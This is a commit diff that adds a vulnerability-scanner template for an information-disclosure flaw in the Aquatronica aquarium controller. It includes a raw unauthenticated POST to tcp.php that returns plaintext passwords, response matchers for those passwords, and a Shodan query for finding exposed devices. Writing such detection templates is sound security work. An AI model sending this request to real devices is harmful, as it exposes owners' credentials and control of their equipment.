add aquatronica control system
parent
10e92b1204
commit
da776929c4
|
@ -0,0 +1,37 @@
|
|||
id: aquatronica-password-disclosure
|
||||
|
||||
info:
|
||||
name: Aquatronica Control System 5.1.6 - Information Disclosure
|
||||
author: securityforeveryone
|
||||
severity: high
|
||||
description: |
|
||||
The tcp.php endpoint on the Aquatronica controller is exposed to unauthenticated attackers over the network. This vulnerability allows remote attackers to send a POST request which can reveal sensitive configuration information, including plaintext passwords. This can lead to unauthorized access and control over the aquarium controller, compromising its security and potentially allowing attackers to manipulate its settings.
|
||||
reference:
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
|
||||
- https://www.exploit-db.com/exploits/52028
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"aquatronica"
|
||||
tags: exploitdb,aquatronica
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /tcp.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "WEB_PASSWORD"
|
||||
- "pwd=""
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue